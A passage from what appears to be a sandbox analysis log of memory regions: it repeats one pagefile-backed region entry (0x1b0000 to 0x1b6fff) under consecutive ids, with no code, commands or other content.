= 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8547 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8548 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8549 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8550 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8551 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8552 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8553 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8554 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8555 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8556 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8557 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8558 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8559 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8560 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8561 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8562 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8563 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8564 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8565 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8566 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8567 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8568 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8569 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8570 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8571 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8572 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8573 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8574 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8575 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8576 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8577 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8578 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8579 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8580 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8581 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8582 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8583 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8584 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8585 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8586 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8587 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8588 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8589 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8590 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8591 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8592 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8593 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8594 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8595 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8596 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8597 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8598 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8599 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8600 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8601 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8602 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8603 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8604 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8605 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8607 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8608 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8609 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8610 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8611 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8612 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8613 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8614 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8615 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8616 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8617 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8618 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8619 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8620 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8621 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8622 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8623 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8624 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8625 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8626 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8627 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8628 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8629 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8630 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8631 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8632 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8633 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8634 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8635 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8636 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8637 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8638 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8639 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8640 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8641 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8642 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8643 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8644 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8645 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8646 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8647 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8648 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8649 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8650 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8651 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8652 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8653 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8654 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8655 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8656 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8657 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8658 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8659 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8660 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8661 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8662 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8663 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8664 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8665 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8666 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8667 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8668 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8669 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8670 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8671 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8672 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8673 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8674 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8675 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8676 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8677 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8678 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8679 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8680 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8681 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8682 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8683 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8684 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8685 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8686 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8687 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8688 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8689 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8690 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8691 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8692 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8693 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8694 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8695 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8696 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8697 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8698 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8699 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8700 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8701 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8702 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8703 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8704 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8705 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8706 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8707 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8708 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8709 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8710 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8711 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8712 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8713 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8714 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8715 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8716 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8717 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8718 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8719 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8720 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8721 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8722 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8723 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8724 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8725 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = 